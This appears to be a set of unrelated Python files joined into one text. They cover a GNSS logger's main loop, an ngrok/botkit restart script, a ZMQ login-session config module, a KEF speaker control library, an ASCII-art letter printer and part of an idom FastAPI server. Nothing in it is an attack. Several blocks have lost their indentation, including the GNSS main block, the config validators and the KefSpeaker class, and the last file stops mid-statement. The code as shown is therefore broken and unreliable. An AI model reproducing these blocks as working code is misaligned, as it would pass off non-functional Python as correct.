        self.__start_flashing(SLOW_FLASH_TIMES)

    def set_fast_flash(self):
        self.__current_state = self.LedStates.FAST_FLASH
        self.__start_flashing(FAST_FLASH_TIMES)

    def get_state(self):
        return self.__current_state
if __name__ == "__main__":
try:
GPIO.setmode(GPIO.BCM)
button = ButtonControl(BUTTON_GPIO_PIN)
button.start()
gnss = GnssControl()
gnss.start()
led = LedControl(LED_GPIO_PIN)
led.set_fast_flash()
while(button.get_state() != button.ButtonPressStates.LONGPRESS):
if (button.get_state() == button.ButtonPressStates.SHORTPRESS):
if(gnss.get_state() == gnss.GnssStates.STOP):
led.set_on()
gnss.set_recording()
elif (gnss.get_state() == gnss.GnssStates.RECORD):
led.set_slow_flash()
gnss.set_paused()
elif (gnss.get_state() == gnss.GnssStates.PAUSE):
led.set_on()
gnss.set_recording()
button.set_not_pressed()
except KeyboardInterrupt:
print "User Cancelled (Ctrl C)"
except:
print "Unexpected error - ", sys.exc_info()[0], sys.exc_info()[1]
raise
finally:
button.stopController()
button.join()
led.set_off()
gnss.set_stopped()
gnss.join()
GPIO.cleanup()
|
botkit_with_auto-refreshed-ngrok.py | #!/usr/bin/env python
"""This is part of the MEA-Calendar Webex-Teams bot functionality.
It overcomes the limitation of the ngrok free account limitation of tunnel expiration every 8 hours,
by automatically stopping the current ngrok and botkit every 7.5 hours and then recreating a new ngrok
session, getting the new session's URL, and restarting botkit using the new URL.
The logic is scheduled to run every 7.5 hours natively within the script. No need for external cron scheduler.
"""
import subprocess
import requests
import json
import time
import schedule
import threading
import sys
__author__ = "Charles Youssef"
__copyright__ = "Copyright 2019 Cisco and/or its affiliates"
__license__ = "CISCO SAMPLE CODE LICENSE"
__version__ = "1.1"
__email__ = "cyoussef@cisco.com"
def bot_run():
    """Look up the fresh ngrok tunnel URL and launch botkit against it."""
    # Query the local ngrok agent API for the active tunnels.
    ngrok_api_url = "http://localhost:4040/api/tunnels"
    session_info = json.loads(requests.get(ngrok_api_url).text)
    public_url = session_info['tunnels'][1]['public_url']
    time.sleep(10)
    print("%s: %s" % (time.asctime(time.localtime(time.time())), "Starting a new bot..."))
    # Blocks for the lifetime of the bot; callers run this in a thread.
    subprocess.run("PUBLIC_URL=%s node bot.js" % public_url, shell=True)
def main():
    """Recycle the ngrok tunnel and botkit: stop both, restart fresh.

    Stops the running node and ngrok processes, opens a new ngrok tunnel
    on port 3000, then relaunches botkit in a daemon thread (bot_run) so
    this function returns promptly for the scheduler.
    """
    # stop the currently running botkit node:
    print("%s: %s" % (time.asctime(time.localtime(time.time())), "Stopping the current bot..."))
    # FIX: this result was misleadingly named stop_ngrok; also use the
    # list form (shell=False) consistently for both pkill invocations.
    stop_node = subprocess.run("pkill -9 node".split(), stdout=subprocess.PIPE)
    time.sleep(10)
    # stop the currently running ngrok session:
    print("%s: %s" % (time.asctime(time.localtime(time.time())), "Stopping the current ngrok session..."))
    stop_ngrok = subprocess.run("pkill -9 ngrok".split(), stdout=subprocess.PIPE)
    time.sleep(10)
    # start a new ngrok session on http port 3000 (used by botkit):
    print("%s: %s" % (time.asctime(time.localtime(time.time())), "Starting a new ngrok session..."))
    ngrok = subprocess.Popen(['ngrok', 'http', '3000'], stdout=subprocess.PIPE)
    time.sleep(10)
    # start a new botkit node as a separate thread, as otherwise the command
    # has to be ran with Shell=True and otherwise the program execution is stopped
    threading1 = threading.Thread(target=bot_run)
    threading1.daemon = True
    threading1.start()
if __name__ == "__main__":
    # Run once now, then repeatedly every 7 hours 30 minutes (= 450 min).
    main()
    schedule.every(450).minutes.do(main)
    try:
        while True:
            schedule.run_pending()
            time.sleep(1)
    except (KeyboardInterrupt, EOFError):
        sys.exit(1)
|
_config.py | """
Copyright (C) 2021 Intel Corporation
SPDX-License-Identifier: BSD-3-Clause
"""
from envparse import Env
from zmq_integration_lib import InputPortWithEvents, get_outpad
from threading import Thread, RLock
class LoginSessionWatcher(object):
    """Tracks sign-in/sign-out events arriving on a ZMQ input port.

    A daemon thread consumes events and updates the current session;
    readers use the session_valid / session_id properties.
    """
    _session_valid = None
    _session_id = None
    _lock = None

    def __init__(self, input_addr, input_topic):
        self._lock = RLock()
        self.input_port = InputPortWithEvents(input_addr, input_topic)

    def run_thread(self):
        # Daemon thread: dies with the process, no join required.
        t = Thread(target=self._watch_for_session_change, daemon=True)
        t.start()

    def _watch_for_session_change(self):
        print("Thread running")
        for id, event in self.input_port.data_and_event_generator():
            # BUG FIX: mutate the shared session state under the lock.
            # The readers already locked, but the writer did not, so a
            # reader could observe a torn valid/id pair.
            if event == "signin":
                with self._lock:
                    self._session_valid = True
                    self._session_id = id
            elif event == "signout":
                print("got a signout event")
                with self._lock:
                    self._session_valid = False
                    self._session_id = None

    @property
    def session_valid(self):
        with self._lock:
            return self._session_valid

    @property
    def session_id(self):
        with self._lock:
            # The id may arrive as bytes; fall back to the raw value.
            try:
                return self._session_id.decode()
            except Exception:
                return self._session_id
def get_login_watcher():
    """Create a LoginSessionWatcher on the configured input and start it."""
    watcher = LoginSessionWatcher(INPUT_ADDR, INPUT_TOPIC)
    watcher.run_thread()
    return watcher
def get_output_port():
    """Return an output pad bound to the configured address and topic."""
    return get_outpad(OUTPUT_ADDR, OUTPUT_TOPIC)
def display_help():
    """Print the environment variables this application requires."""
    for line in (
        "The application needs the following environment variables.",
        "INPUT_ADDR, INPUT_TOPIC, OUTPUT_ADDR, OUTPUT_TOPIC",
        "Please set the variables and try again.",
    ):
        print(line)
def _validate_env_addr_variable(INPUT_ADDR, OUTPUT_ADDR, AUTHZ_SERVER_ADDR):
for variable in [INPUT_ADDR, OUTPUT_ADDR, AUTHZ_SERVER_ADDR]:
if (
not (type(variable) == str)
or not (len(variable.split()) == 1)
or not (("tcp" in variable.split(":")) or ("ipc" in variable.split(":")))
):
raise ValueError("Please check {} address".format(variable))
def _validate_env_topic_variable(INPUT_TOPIC, OUTPUT_TOPIC, WAKE_UP_WORD):
for variable in [INPUT_TOPIC, OUTPUT_TOPIC, WAKE_UP_WORD]:
if not (type(variable) == str) or not (len(variable.split()) == 1):
raise ValueError("Please check {} topic".format(variable))
def _validate_env_log_level_variable(LOG_LEVEL):
if not LOG_LEVEL.lower() in ["info", "error", "debug"] or not (
len(LOG_LEVEL.split()) == 1
):
raise ValueError("Please provide correct Log level")
def _read_env_variables():
    """Read and validate all required configuration from the environment.

    Returns the tuple (OUTPUT_ADDR, OUTPUT_TOPIC, INPUT_ADDR,
    INPUT_TOPIC, AUTHZ_SERVER_ADDR, WAKE_UP_WORD, LOG_LEVEL).
    """
    # Schema: everything is a plain string; LOG_LEVEL defaults to ERROR.
    env = Env(
        OUTPUT_ADDR=str,
        OUTPUT_TOPIC=str,
        INPUT_TOPIC=str,
        INPUT_ADDR=str,
        AUTHZ_SERVER_ADDR=str,
        WAKE_UP_WORD=str,
        LOG_LEVEL=dict(cast=str, default="ERROR"),
    )
    output_addr = env("OUTPUT_ADDR")
    output_topic = env("OUTPUT_TOPIC")
    input_addr = env("INPUT_ADDR")
    input_topic = env("INPUT_TOPIC")
    authz_server_addr = env("AUTHZ_SERVER_ADDR")
    wake_up_word = env("WAKE_UP_WORD")
    log_level = env("LOG_LEVEL")
    # Fail fast on malformed configuration.
    _validate_env_addr_variable(input_addr, output_addr, authz_server_addr)
    _validate_env_topic_variable(input_topic, output_topic, wake_up_word)
    _validate_env_log_level_variable(log_level)
    return (
        output_addr,
        output_topic,
        input_addr,
        input_topic,
        authz_server_addr,
        wake_up_word,
        log_level,
    )
def get_logger():
    """Build the root logger configured from the global LOG_LEVEL string."""
    import logging
    global LOG_LEVEL  # string; any unrecognized value falls back to ERROR
    level_by_name = {
        "WARNING": logging.WARNING,
        "DEBUG": logging.DEBUG,
        "INFO": logging.INFO,
    }
    level = level_by_name.get(LOG_LEVEL.upper(), logging.ERROR)
    logging.basicConfig(
        format="%(asctime)s - %(levelname)s - [%(filename)s:%(lineno)s - %(funcName)-20s ] - %(message)s",
        level=level,
    )
    logging.root.setLevel(level)
    logger = logging.getLogger()
    logger.setLevel(level)
    return logger
# Read and validate configuration once at import time; importing this
# module fails fast if the environment is incomplete.
(
    OUTPUT_ADDR,
    OUTPUT_TOPIC,
    INPUT_ADDR,
    INPUT_TOPIC,
    AUTHZ_SERVER_ADDR,
    WAKE_UP_WORD,
    LOG_LEVEL,
) = _read_env_variables()
# Audio capture parameters.
sample_width = 2  # bytes per sample (16-bit)
audio_channels = 1  # mono
bitrate = 16000  # presumably the sample rate in Hz — TODO confirm
|
__init__.py | #! /usr/bin/env python
"""pykef is the library for interfacing with kef speakers"""
import datetime
import logging
import select
import socket
from enum import Enum
from threading import Semaphore, Thread
from time import sleep, time
_LOGGER = logging.getLogger(__name__)
_VOL_STEP = 0.05 # 5 percent
_RESPONSE_OK = 17 # status byte returned by the speaker on success
_TIMEOUT = 1.0 # in secs
_KEEP_ALIVE = 1.0 # in secs; idle time before the connection is dropped
_SCALE = 100.0 # device volume is 0-100; the API exposes 0.0-1.0
_RETRIES = 10 # connection attempts before giving up
_WAIT_FOR_ONLINE_STATE = 30.0 # in secs; also the online-state cache TTL
class Volume(Enum):
    """Mute/unmute pseudo-volume values accepted by the volume setter."""
    Mute = "MUTE"
    Unmute = "UNMUTE"
class InputSource(Enum):
    """Speaker input sources, valued as the raw select-source command bytes."""

    Wifi = bytes([0x53, 0x30, 0x81, 0x12, 0x82])
    Bluetooth = bytes([0x53, 0x30, 0x81, 0x19, 0xAD])
    Aux = bytes([0x53, 0x30, 0x81, 0x1A, 0x9B])
    Opt = bytes([0x53, 0x30, 0x81, 0x1B, 0x00])
    Usb = bytes([0x53, 0x30, 0x81, 0x1C, 0xF7])

    def __str__(self):
        # The member name doubles as the human-readable label.
        return self.name

    @classmethod
    def from_str(cls, name):
        """Return the first source whose printed name ends with *name*,
        or None when nothing matches."""
        return next((source for source in cls if str(source).endswith(name)), None)
class States(Enum):
    """States for a KefClientDevice."""
    Online = 1
    Offline = 2
    TurningOff = 3  # set after a successful turnOff command
class Cache:
    """Holds a value and serves it from cache for a while after set()."""

    def __init__(self, initial_value, get_function, cache_timeout=1.0):
        """Initialize the cached-value holder.

        initial_value: value served until the first refresh.
        get_function: zero-argument callable producing a fresh value.
        cache_timeout: seconds a set() value stays fresh.
        """
        self.__value = initial_value
        self.__get_function = get_function
        self.__cache_timeout = cache_timeout
        # Deadline starts at "now"; only set() pushes it forward.
        self.__current_timeout = time()

    def get(self):
        """Return the cached value, refreshing it via the getter once expired."""
        expired = self.__current_timeout - time() < 0
        if expired:
            self.__value = self.__get_function()
        return self.__value

    def set(self, value, update_cache_timeout=True):
        """Store *value*; optionally restart the freshness window."""
        if update_cache_timeout:
            self.__current_timeout = time() + self.__cache_timeout
        self.__value = value
class KefSpeaker:
def __init__(self, host, port):
self.__semaphore = Semaphore()
self.__socket = None
self.__connected = False
self.__last_timestamp = 0
self.__host = host
self.__port = port
self.__state = Cache(None, self.__getState, _WAIT_FOR_ONLINE_STATE)
self.__volume = Cache(None, self.__getVolume)
self.__source = Cache(None, self.__getSource)
self.__update_thread = Thread(target=self.__update, daemon=True)
self.__update_thread.start()
def __refresh_connection(self):
"""Connect if not connected.
Retry at max for 100 times, with longer interval each time.
Update timestamp that keep connection alive.
If unable to connect due to no route to host, set to offline
If speaker is offline, max retires is infinite.
"""
def setup_connection():
self.__socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
self.__socket.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
self.__socket.settimeout(_TIMEOUT)
return self.__socket
self.__last_timestamp = time()
if not self.__connected:
self.__socket = setup_connection()
self.__connected = False
wait = 0.1
retries = 0
while retries < _RETRIES:
self.__last_timestamp = time()
try:
self.__socket.connect((self.__host, self.__port))
self.__connected = True
_LOGGER.debug("Online")
_LOGGER.debug("Connected")
break
except ConnectionRefusedError:
self.__socket = setup_connection()
wait += 0.1
sleep(wait)
except BlockingIOError: # Connection ingoing
retries = 0
wait = _TIMEOUT
sleep(wait)
except OSError as err: # Host is down
_LOGGER.debug("Offline")
raise ConnectionRefusedError("Speaker is offline") from err
except socket.timeout: # Host went offline (probably)
_LOGGER.debug("Offline")
raise ConnectionRefusedError("Speaker is offline") from err
retries += 1
def __disconnect_if_passive(self):
"""Disconnect if connection is not used for a while (old timestamp)."""
should_disconnect = time() - self.__last_timestamp > _KEEP_ALIVE
if self.__connected and should_disconnect:
self.__connected = False
self.__socket.close()
_LOGGER.debug("Disconneced")
def __update(self):
"""Update speakers, disconnects speakers when passive."""
while 1:
sleep(0.1)
self.__disconnect_if_passive()
def __sendCommand(self, message):
"""Send command to speakers, returns the response."""
self.__refresh_connection()
if self.__connected:
self.__semaphore.acquire()
try:
self.__socket.sendall(message)
self.__socket.setblocking(0)
ready = select.select([self.__socket], [], [], _TIMEOUT)
if ready[0]:
data = self.__socket.recv(1024)
else:
data = None
self.__socket.setblocking(1)
except Exception as err:
raise OSError("__sendCommand failed") from err
finally:
self.__semaphore.release()
else:
raise OSError("__sendCommand failed")
return data[len(data) - 2] if data else None
def __wait_for_online_state(self, time_to_wait=_WAIT_FOR_ONLINE_STATE):
"""Use this function to wait for online state."""
while time_to_wait > 0 and self.__state.get() is not States.Online:
time_to_sleep = 0.1
time_to_wait -= time_to_sleep
sleep(time_to_sleep)
def __getVolume(self, scale=True):
_LOGGER.debug("__getVolume")
msg = bytes([0x47, 0x25, 0x80, 0x6C])
volume = self.__sendCommand(msg)
if volume:
scaled_volume = volume / _SCALE if volume < 128 else Volume.Mute
return scaled_volume if scale else volume
else:
raise ConnectionRefusedError("Cannot fetch volume from speaker")
def __setVolume(self, volume):
_LOGGER.debug("__setVolume: " + "volume:" + str(volume))
if not volume:
return
if volume not in [Volume.Mute, Volume.Unmute]:
set_volume = int(max(0.0, min(1.0, volume)) * _SCALE)
else:
should_mute = volume is Volume.Mute
current_volume = self.__getVolume(scale=False)
if current_volume:
set_volume = int(current_volume) % 128 + (128 * should_mute)
# write vol level in 4th place , add 128 to current level to mute
msg = bytes([0x53, 0x25, 0x81, int(set_volume), 0x1A])
return self.__sendCommand(msg) == _RESPONSE_OK
def __getSource(self):
_LOGGER.debug("__getSource")
msg = bytes([0x47, 0x30, 0x80, 0xD9])
table = {
18: InputSource.Wifi,
25: InputSource.Bluetooth,
26: InputSource.Aux,
27: InputSource.Opt,
28: InputSource.Usb,
31: InputSource.Bluetooth,
}
response = self.__sendCommand(msg)
return table.get(response) if response else None
def __setSource(self, source):
_LOGGER.debug("__setSource: " + "source:" + str(source))
return self.__sendCommand(source.value) == _RESPONSE_OK
def __getState(self):
state = States.Online
try:
self.__refresh_connection()
except Exception:
state = States.Offline
return state
@property
def volume(self):
"""Volume level of the media player (0..1). None if muted"""
value = self.__volume.get()
if value:
self.__volume.set(value, update_cache_timeout=False)
return value
@volume.setter
def volume(self, value):
self.__wait_for_online_state()
success = self.__setVolume(value)
if success and value is not Volume.Unmute:
self.__volume.set(value)
@property
def source(self):
"""Get the input source of the speaker."""
value = self.__source.get()
if value:
self.__source.set(value, update_cache_timeout=False)
return value
@source.setter
def source(self, value):
self.__wait_for_online_state()
success = self.__setSource(value)
if success:
self.__source.set(value)
@property
def muted(self):
return self.volume is Volume.Mute
@muted.setter
def muted(self, value):
self.volume = Volume.Mute if value else Volume.Unmute
@property
def online(self):
return self.__state.get() is States.Online
def turnOff(self):
msg = bytes([0x53, 0x30, 0x81, 0x9B, 0x0B])
success = self.__sendCommand(msg) == _RESPONSE_OK
if success:
self.__state.set(States.TurningOff)
def increaseVolume(self, step=None):
    """Increase volume by step, or 5% by default.
    Constraint: 0.0 < step < 1.0.
    """
    current = self.volume
    if not current:
        return  # volume unknown or muted -> nothing to bump
    self.volume = current + (step if step else _VOL_STEP)
def decreaseVolume(self, step=None):
    """Decrease volume by step, or 5% by default.
    Constraint: 0.0 < step < 1.0.
    """
    # Delegates to increaseVolume with a negated step.
    self.increaseVolume(-(step or _VOL_STEP))
|
color pattern with threading.py | import time
import random
from multiprocessing import pool
from playsound import playsound
from threading import Thread
# Shared renderer state: ``i`` is the glyph row being printed (-1 before the
# first pass; the driver loop advances it to 0..4), ``l`` is a helper flag
# used by ``loops.A``; ``count`` is never read afterwards.
i = -1
l = 0
count = 0
class loops:
    """One-row-at-a-time renderers for 5-row ASCII-art letter glyphs.

    The module-level global ``i`` holds the row (0..4) currently being
    printed; the driver loop at the bottom of the file advances it once
    per pass over the input text. Each letter method prints row ``i`` of
    its glyph, calls ``x.loop()`` (the module-level instance) for
    inter-letter spacing, and returns after a single iteration of its
    ``for`` loop.
    """
    def loop(self):
        # Gap printed between adjacent glyphs.
        print(" ", end="")
    def A(self):
        global i
        global l
        global i  # NOTE(review): duplicate of the declaration two lines up (harmless)
        for j in range(i, 5):
            for k in range(4, i, -1):
                print(" ", end="")
            print("*", end="")
            if i != 0:
                l = 1
            # ``l`` stays 0 only on the very first row, suppressing the
            # inner segment of the glyph there.
            for q in range(0, l):
                if (i == 3):
                    print(" *" * 3, end="")
                else:
                    print(" " * (i + (i - 1)), end="*")
            for k in range(4, i, -1):
                print(" ", end="")
            x.loop()
            return
    def B(self):
        global i
        for j in range(i, 6):
            print("*", end="")
            if (i == 0 or i == 2 or i == 4):
                print(" *" * 3, end=" ")
            else:
                print(" " * 6, end="*")
            x.loop()
            return
    def C(self):
        global i
        for i in range(i, 5):
            if (i == 0 or i == 4):
                print(" " * 2, end=" *" * 3)
            elif (i == 1 or i == 3):
                print(" " * 1, end="*")
                print(" " * 5, end=" ")
            else:
                print("*", end=" " * 7)
            x.loop()
            return
    def D(self):
        global i
        for i in range(i, 5):
            print("*", end=" ")
            if (i == 0 or i == 4):
                print("* " * 2, end=" " * 1)
            elif (i == 1 or i == 3):
                print(" " * 4, end="*")
            else:
                print(" " * 3, end=" *")
            x.loop()
            return
    def E(self):
        global i
        for i in range(i, 5):
            if (i == 0 or i == 2 or i == 4):
                print("* " * 3, end="*")
            else:
                print("* ", end=" " * 5)
            x.loop()
            return
    def F(self):
        global i
        for i in range(i, 5):
            if (i == 0):
                print("* " * 3, end="*")
            elif (i == 2):
                print("* " * 3, end=" ")
            else:
                print("* ", end=" " * 5)
            x.loop()
            return
    def G(self):
        global i
        for i in range(i, 5):
            if (i == 0):
                print(" " * 2, end=" *" * 3)
                print(" ", end="")
            elif (i == 4):
                print(" " * 2, end=" * " * 2)
                print(" ", end="")
            elif (i == 1):
                print(" " * 1, end="*")
                print(" " * 7, end="")
            elif (i == 3):
                print(" " * 1, end="*")
                print(" " * 5, end=" *")
            else:
                print("*", end=" " * 2)
                print(" *" * 3, end="")
            x.loop()
            return
    def H(self):
        global i
        for i in range(i, 5):
            if (i == 2):
                print("* " * 3, end="*")
            else:
                print("*", end=" " * 5)
                print("*", end="")
            x.loop()
            return
    def I(self):
        global i
        for i in range(i, 5):
            if (i == 0 or i == 4):
                print("* " * 3, end="*")
            else:
                print(" " * 3, end="*")
                print(" " * 3, end="")
            x.loop()
            return
    def J(self):
        global i
        for i in range(i, 5):
            if (i == 0):
                print("* " * 3, end="*")
            elif (i == 3 or i == 2):
                print("* ", end=" *")
                print(" " * 3, end="")
            elif (i == 4):
                print(" ", end="*")
                print(" " * 2, end="")
            else:
                print(" " * 3, end="*")
                print(" " * 3, end="")
            x.loop()
            return
    def K(self):
        global i
        for i in range(i, 5):
            if i == 0 or i == 4:
                print("*", end=" " * 3)
                print("*", end="")
            elif i == 1 or i == 3:
                print("*", end=" " * 2)
                print("* ", end=" ")
            else:
                print("* ", end=" *")
                print(" ", end=" ")
            x.loop()
            return
    def L(self):
        global i
        for i in range(i, 5):
            if (i == 4):
                print("* " * 3, end="*")
            else:
                print("* ", end=" " * 5)
            x.loop()
            return
    def M(self):
        global i
        for i in range(i, 5):
            print("* ", end="")
            if (i == 1):
                print("* ", end=" * ")
            elif (i == 2):
                print(" " * 2, end="* ")
            else:
                print(" " * 3, end="")
            print("*", end="")
            x.loop()
            return
    def N(self):
        global i
        for i in range(i, 5):
            print("*", end="")
            if (i == 0):
                print(" " * 3, end="")
            else:
                # Diagonal stroke: the inner star moves right as i grows.
                print(" " * i, end="*")
                print(" " * (5 - i), end="")
            print("*", end="")
            x.loop()
            return
    def O(self):
        global i
        for i in range(i, 5):
            if (i == 0 or i == 4):
                print(" " * 4, end="*")
                print(" " * 3, end=" ")
            elif (i == 2):
                print("*", end=" " * 7)
                print("*", end="")
            else:
                print(" ", end="*")
                print(" ", end="* ")
            x.loop()
            return
    def P(self):
        global i
        for i in range(i, 5):
            print("*", end="")
            if (i == 0 or i == 2):
                print(" *" * 3, end=" ")
            elif (i == 1):
                print(" " * 6, end="*")
            else:
                print(" " * 7, end="")
            x.loop()
            return
    def Q(self):
        global i
        for i in range(i, 5):
            if (i == 0):
                print(" " * 4, end="*")
                print(" " * 3, end=" ")
            elif (i == 4):
                print(" " * 4, end="*")
                print(" " * 3, end="*")
            elif (i == 2):
                print("*", end=" " * 7)
                print("*", end="")
            elif (i == 3):
                print(" ", end="*")
                print(" " * 3, end="* * ")
            else:
                print(" ", end="*")
                print(" ", end="* ")
            x.loop()
            return
    def R(self):
        global i
        for i in range(i, 5):
            print("*", end="")
            if (i == 0 or i == 2):
                print(" *" * 3, end=" ")
            elif (i == 1):
                print(" " * 6, end="*")
            else:
                # Leg of the R slants outwards with the row index.
                print(" " * i, end=" *")
                print(" ", end=" " * (4 - i))
            x.loop()
            return
    def S(self):
        global i
        for i in range(i, 5):
            if (i == 0):
                print(" " * 2, end="* " * 3)
                print("", end="")
            elif (i == 4):
                print(" ", end="* " * 3)
                print("", end="")
            elif (i == 1):
                print("*", end=" " * 7)
            elif (i == 2):
                print(" ", end="*")
                print(" " * 4, end="")
            else:
                print("*", end=" " * 6)
                print("*", end="")
            x.loop()
            return
    def T(self):
        global i
        for i in range(i, 5):
            if (i == 0):
                print("* " * 3, end="*")
            else:
                print(" " * 2, end=" *")
                print(" " * 2, end=" ")
            x.loop()
            return
    def U(self):
        global i
        for i in range(i, 5):
            if (i == 4):
                print(" " * 2, end="* " * 2)
                print(" " * 2, end="")
            elif (i == 3):
                print(" ", end="*")
                print(" " * 4, end="*")
                print(" ", end="")
            else:
                print("* ", end=" " * 5)
                print("*", end="")
            x.loop()
            return
    def V(self):
        global i
        for i in range(i, 5):
            if (i == 0):
                print("*", end=" " * 7)
                print("*", end="")
            elif (i == 1):
                print(" *", end=" " * 5)
                print("*", end=" ")
            elif (i == 2):
                print(" *", end=" " * 3)
                print("*", end=" ")
            elif (i == 3):
                print(" *", end=" ")
                print("*", end=" ")
            else:
                print(" " * 4, end="*")
                print(" " * 4, end="")
            x.loop()
            return
    def W(self):
        global i
        for i in range(i, 5):
            if (i == 0):
                print("*", end=" " * 11)
                print("*", end="")
            elif i == 1:
                print(" *", end=" " * 9)
                print("", end="* ")
            elif (i == 2):
                print(" * ", end=" *")
                print(" ", end=" ")
            elif (i == 3):
                print(" " * 3, end="*")
                print(" * * ", end=" " * 2)
            else:
                print(" " * 3, end=" *")
                print(" *", end=" " * 4)
            x.loop()
            return
    def X(self):
        global i
        for i in range(i, 5):
            if (i == 0 or i == 4):
                print("*", end=" " * 5)
                print("*", end="")
            elif (i == 1 or i == 3):
                print(" *", end=" " * 3)
                print("* ", end="")
            else:
                print(" " * 3, end="*")
                print(" " * 3, end="")
            x.loop()
            return
    def Y(self):
        global i
        for i in range(i, 5):
            if (i == 0):
                print("*", end=" " * 5)
                print("*", end="")
            elif (i == 1):
                print(" *", end=" " * 3)
                print("* ", end="")
            else:
                print(" " * 3, end="*")
                print(" " * 3, end="")
            x.loop()
            return
    def Z(self):
        global i
        for i in range(i, 5):
            if (i == 0 or i == 4):
                print("* " * 3, end="*")
            elif (i == 1):
                print(" " * 5, end="*")
                print(" ", end="")
            elif (i == 2):
                print(" " * 3, end="*")
                print(" " * 2, end=" ")
            else:
                print(" " * 1, end="*")
                print(" " * 3, end=" ")
            x.loop()
            return
print()
def play():
    """Prompt for a track name and play the matching mp3 once."""
    track = input("ENTER SOUND")
    time.sleep(1.8)
    print("\n" * 30)
    # CHANGE DIRECTORY HERE ................................................................
    playsound("C:\\Users\\chetan\\Desktop\\language\\playsound\\" + track + ".mp3")
    # CHANGE DIRECTORY HERE.................................................................
    time.sleep(1.1)
x = loops()

# DRIVER CODE
#
# Reads a line of text, starts the music thread, then renders the text as
# 5-row coloured ASCII-art, one glyph row per pass.
#
# IMPROVEMENT over the original: the 26 near-identical ``elif`` branches
# (one per letter, each with its own colour counter variable aa..zz) are
# replaced by getattr-based dispatch onto the ``loops`` methods plus a
# single letter->colour dict. The builtin names ``list`` is no longer
# shadowed. Behaviour is unchanged: each letter gets a random base colour
# on first appearance, and its code is incremented on every draw.
n = input("ENTER YOUR TEXT")
print("type any song name from here ...")
song_names = ["birth", 'rider', 'standard', 'teri mitti me', 'chitrakaar']
print(song_names)
# WE CAN ADD birthday and rider SONG HERE
thread = Thread(target=play)
thread.start()
time.sleep(7)

k = len(n)
s = 0.5                                        # delay between glyph columns (seconds)
ansi_codes = [30, 31, 32, 33, 34, 35, 36, 37]  # ANSI foreground colour codes
letter_colors = {}                             # uppercase letter -> current colour code

for o in range(5):                             # one pass per glyph row
    i = i + 1                                  # advance the shared row counter used by loops
    for f in range(k):
        ch = n[f].upper()
        if ch == " ":
            x.loop()
            x.loop()
            continue
        renderer = getattr(x, ch, None)
        if renderer is None:
            continue                           # characters with no glyph are skipped
        if letter_colors.get(ch, 0) == 0:
            letter_colors[ch] = random.choice(ansi_codes)
        letter_colors[ch] += 1                 # colour drifts on every draw, as before
        print("\033[1;{}m".format(letter_colors[ch]), end="")
        time.sleep(s)
        renderer()
    print()

time.sleep(6)
print("\n" * 8)
print('THANK YOU ', end='', flush=True)
for x in range(8):
    for frame in r'-\|/-\|/':
        print('\b', frame, sep='', end='', flush=True)
        time.sleep(0.2)
print('\b ')
thread.join()
|
fastapi.py | import json
import logging
import sys
import time
import uuid
from threading import Event, Thread
from typing import Any, Dict, Optional, Tuple, Type, Union, cast
from fastapi import APIRouter, FastAPI, Request, WebSocket
from fastapi.middleware.cors import CORSMiddleware
from fastapi.responses import RedirectResponse
from fastapi.staticfiles import StaticFiles
from mypy_extensions import TypedDict
from starlette.websockets import WebSocketDisconnect
from uvicorn.config import Config as UvicornConfig
from uvicorn.server import Server as UvicornServer
from uvicorn.supervisors.multiprocess import Multiprocess
from uvicorn.supervisors.statreload import StatReload as ChangeReload
from idom.config import IDOM_CLIENT_BUILD_DIR
from idom.core.dispatcher import (
AbstractDispatcher,
RecvCoroutine,
SendCoroutine,
SharedViewDispatcher,
SingleViewDispatcher,
)
from idom.core.layout import Layout, LayoutEvent, LayoutUpdate
from .base import AbstractRenderServer
logger = logging.getLogger(__name__)
class Config(TypedDict, total=False):
    """Config for :class:`FastApiRenderServer`"""

    # Enable CORS: a dict is passed straight to CORSMiddleware as kwargs,
    # True enables the permissive default (allow all origins).
    cors: Union[bool, Dict[str, Any]]
    # Prefix prepended to every route the server registers.
    url_prefix: str
    # Whether to mount the built idom client under <url_prefix>/client.
    serve_static_files: bool
    # Whether <url_prefix>/ redirects to the client's index.html.
    redirect_root_to_index: bool
class FastApiRenderServer(AbstractRenderServer[FastAPI, Config]):
    """Base FastAPI render-server extension.

    (The original docstring said "sanic" -- copy-paste from the sanic
    implementation; this is the FastAPI port.)
    """

    _dispatcher_type: Type[AbstractDispatcher]
    _server: UvicornServer

    def stop(self, timeout: float = 3) -> None:
        """Stop the running application.

        BUG FIX: the original evaluated ``self._server.should_exit`` as a
        bare expression instead of assigning it, so uvicorn was never told
        to shut down.
        """
        self._server.should_exit = True
        if self._daemon_thread is not None:
            self._daemon_thread.join(timeout)

    def _create_config(self, config: Optional[Config]) -> Config:
        """Merge user-supplied options over the defaults."""
        new_config: Config = {
            "cors": False,
            "url_prefix": "",
            "serve_static_files": True,
            "redirect_root_to_index": True,
            **(config or {}),  # type: ignore
        }
        return new_config

    def _default_application(self, config: Config) -> FastAPI:
        """Create a bare FastAPI app when the user did not supply one."""
        return FastAPI()

    def _setup_application(self, config: Config, app: FastAPI) -> None:
        """Wire routes, static files and (optionally) CORS onto *app*."""
        router = APIRouter(prefix=config["url_prefix"])
        self._setup_api_router(config, router)
        self._setup_static_files(config, app)

        cors_config = config["cors"]
        if cors_config:  # pragma: no cover
            # True means "allow everything"; a dict is forwarded verbatim.
            cors_params = (
                cors_config
                if isinstance(cors_config, dict)
                else {"allow_origins": ["*"]}
            )
            app.add_middleware(CORSMiddleware, **cors_params)

        app.include_router(router)

    def _setup_application_did_start_event(
        self, config: Config, app: FastAPI, event: Event
    ) -> None:
        """Set *event* once the uvicorn server reports it has started."""

        def target() -> None:
            # Poll because uvicorn exposes no startup callback we can use here.
            while not hasattr(self, "_server") or not self._server.started:
                time.sleep(1e-3)
            event.set()

        Thread(target=target, daemon=True).start()

    def _setup_api_router(self, config: Config, router: APIRouter) -> None:
        """Add routes to the application blueprint"""

        @router.websocket("/stream")
        async def model_stream(socket: WebSocket) -> None:
            await socket.accept()

            async def sock_send(value: LayoutUpdate) -> None:
                await socket.send_text(json.dumps(value))

            async def sock_recv() -> LayoutEvent:
                return LayoutEvent(**json.loads(await socket.receive_text()))

            try:
                await self._run_dispatcher(
                    sock_send, sock_recv, dict(socket.query_params)
                )
            except WebSocketDisconnect as error:
                # Lazy %-style args avoid formatting when INFO is disabled.
                logger.info("WebSocket disconnect: %s", error.code)

    def _setup_static_files(self, config: Config, app: FastAPI) -> None:
        # This really should be added to the APIRouter, but there's a bug in FastAPI
        # BUG: https://github.com/tiangolo/fastapi/issues/1469
        url_prefix = config["url_prefix"]
        if config["serve_static_files"]:
            app.mount(
